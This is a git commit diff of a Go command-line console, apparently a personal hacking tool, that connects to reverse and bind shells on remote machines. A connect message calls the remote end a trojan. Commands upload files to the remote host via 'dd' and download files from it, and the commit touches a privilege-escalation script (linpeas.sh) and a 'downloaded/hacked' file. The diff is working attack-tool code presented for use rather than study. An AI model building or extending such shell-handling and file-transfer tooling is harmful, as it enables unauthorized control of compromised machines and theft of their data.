backup

2022-07-21 23:04:43 +08:00 · 2022-07-21 23:04:43 +08:00 · a0eaa21f06
commit a0eaa21f06
parent 26632830ed
4 changed files with 4808 additions and 38 deletions
--- a/1
+++ b/1
@ -0,0 +1 @@
+2adjfhasjdfjadhkfahsdk
--- a/console.go
+++ b/console.go
@ -23,8 +23,8 @@ func main() {
 	fmt.Println(" \\____|____/ \\____\\___/|_| |_|___/\\___/|_|\\___|")

 	//console()
-	listener("tcp", 4444)
-	//dial()
+	//listener("tcp", 4444)
+	dial("tcp", "127.0.0.1", 4444)
 }

 type env struct {
@ -41,8 +41,11 @@ var lock sync.Mutex
 // listener function
 func listener(network string, port int) {
 	// Create a listener
-	strport := strconv.Itoa(port)
-	listener, err := net.Listen("tcp", ":"+strport)
+	var addr net.TCPAddr
+	addr.IP = net.IPv4(127, 0, 0, 1)
+	addr.Port = port
+	listener, err := net.ListenTCP("tcp", &addr)
+	//listener, err := net.Listen("tcp", ":"+strport)
 	if err != nil {
 		fmt.Println("err = ", err)
 		return
@ -50,10 +53,10 @@ func listener(network string, port int) {
 	fmt.Printf("Listening on local port %d\n", port)
 	defer listener.Close()

-	//var connpool[16] net.Conn
+	//var connpool[16] net.TCPConn
 	//Wait for connection

-	conn, err := listener.Accept()
+	conn, err := listener.AcceptTCP()
 	if err != nil {
 		fmt.Println("err = ", err)
 		return
@ -71,32 +74,22 @@ func listener(network string, port int) {
 	fmt.Print(env1.username + " > ")

 	go func() {
-
 		for {
-			// lock.Lock()
-			// fmt.Println("rece locked")
 			<-receive
 			receiver(conn)
 			fmt.Print(env1.username + " > ")
-			// fmt.Println("rece unlocked")
-			// lock.Unlock()
 		}
-
 	}()

 	go func() {
 		for {
-			// fmt.Println("locked")
-			// fmt.Print(env1.username + " > ")
 			sender(conn, exit, receive)
-			//time.Sleep(2 * time.Second)
-			// fmt.Println("unlocked")
-			// lock.Unlock()
 		}
 	}()

 	aaaa := <-exit // 2. 尝试从通道中读取内容，若通道为空，则阻塞在此
-	fmt.Printf("command: %v", aaaa)
+	fmt.Printf("command: %v\n", aaaa)
+	return
 }

 // 控制台函数
@ -132,10 +125,10 @@ func execInput(input string) error {
 	switch args[0] {

 	case "help":
-		fmt.Print("use show to show options")
-		fmt.Print("use set to set varieties")
-		fmt.Print("use listen to connect a reverse shell")
-		fmt.Print("use dial to connect a bind shell")
+		fmt.Println("use show to show options")
+		fmt.Println("use set to set varieties")
+		fmt.Println("use listen to connect a reverse shell")
+		fmt.Println("use dial to connect a bind shell")
 		return nil

 	case "cd":
@ -167,7 +160,7 @@ func execInput(input string) error {

 	case "show":
 		fmt.Printf("Local listening port (lport): %d\n", env1.lport)
-		fmt.Printf("Remote listening host (rhost): %s\n", env1.rhost)
+		fmt.Printf("Remote listening host (rhost)(only support ipv4 addr): %s\n", env1.rhost)
 		fmt.Printf("Remote listening port (rport): %d\n", env1.rport)
 		return nil

@ -194,27 +187,51 @@ func execInput(input string) error {
 }

 func dial(network string, host string, port int) {
-	dialaddr := net.JoinHostPort(host, strconv.Itoa(port))
-	conn, err := net.Dial(network, dialaddr)
+	//处理连接参数
+	var dialaddr net.TCPAddr
+	var ipargs [4]int
+	args := strings.Split(host, ".")
+	for i := 0; i < 4; i++ {
+		ipargs[i], _ = strconv.Atoi(args[i])
+	}
+	dialaddr.IP = net.IPv4(byte(ipargs[0]), byte(ipargs[1]), byte(ipargs[2]), byte(ipargs[3]))
+	dialaddr.Port = port
+
+	conn, err := net.DialTCP(network, nil, &dialaddr)
 	if err != nil {
 		fmt.Fprintln(os.Stderr, err)
 		return
 	}
 	defer conn.Close()
+	fmt.Println("成功连接木马")

 	exit := make(chan string, 1)
 	receive := make(chan int)

+	conn.Write([]byte("id\n"))
+	receiver(conn)
+	fmt.Print(env1.username + " > ")
+
 	go func() {
-		receiver(conn)
+		for {
+			<-receive
+			receiver(conn)
+			fmt.Print(env1.username + " > ")
+		}
 	}()

-	for {
-		sender(conn, exit, receive)
-	}
+	go func() {
+		for {
+			sender(conn, exit, receive)
+		}
+	}()
+
+	aaaa := <-exit // 2. 尝试从通道中读取内容，若通道为空，则阻塞在此
+	fmt.Printf("command: %v\n", aaaa)
+	return
 }

-func sender(conn net.Conn, exit chan string, receive chan int) {
+func sender(conn *net.TCPConn, exit chan string, receive chan int) {
 	reader := bufio.NewReader(os.Stdin)
 	inp, err := reader.ReadString('\n')
 	if len(inp) == 1 {
@ -224,7 +241,7 @@ func sender(conn net.Conn, exit chan string, receive chan int) {
 	if nil != err {
 		fmt.Println("reader.ReadLine() error:", err)
 	}
-
+	//some built-in command
 	if strings.HasPrefix(inp, ":help") {
 		fmt.Println("use :download FILENAME to download")
 		fmt.Println("use :upload LOCAL REMOTE to upload")
@ -275,19 +292,36 @@ func sender(conn net.Conn, exit chan string, receive chan int) {
 			log.Fatal(err)
 		}

-		conn.FileConn(f)
-		//conn.Write([]byte("dd of=" + args[2] + " status=none" + "\n"))
-		//uploadbuf, _ := os.ReadFile(args[1])
-		//fmt.Print(string(uploadbuf))
-		//conn.Write(uploadbuf)
+		conn.Write([]byte("dd of=" + args[2] + " status=none" + "\n"))
+		uploadbuf, _ := os.ReadFile(args[1])
+		// cmd := append([]byte("dd if="), uploadbuf...)
+		// cmd1 := append(cmd, []byte("|dd of="+args[2]+" status=none\n")...)
+		//conn.Write([]byte(""))
+		// conn.Write([]byte("echo "))
+		conn.Write(uploadbuf)
+		conn.CloseWrite()
+		//conn.Write([]byte("|dd of=" + args[2]))
+		//conn.Write([]byte(">" + args[2]))
+		//n, _ := conn.Write(uploadbuf)
+		// fmt.Print(n)
+		// fmt.Print(len(uploadbuf))
+		// if n == len(uploadbuf) {
+		// 	// fmt.Println("failed to upload")
+		// 	// fmt.Print(env1.username + " > ")
+		// 	fmt.Print(env1.username + " > ")
+		// 	return
+		// }
 		fmt.Print(env1.username + " > ")
+		receive <- 1
+		// fmt.Println("failed to upload")
+		// fmt.Print(env1.username + " > ")
 		return
 	}

 	if strings.HasPrefix(inp, ":exit") {
 		exit <- "server quit" // 3. 向通道内写入内容
-		//conn.Close()
-		fmt.Print(env1.username + " > ")
+		conn.Close()
+		//fmt.Print(env1.username + " > ")
 		return
 	}

--- a/downloaded/hacked.wav
+++ b/downloaded/hacked.wav
--- a/privsec/linpeas.sh
+++ b/privsec/linpeas.sh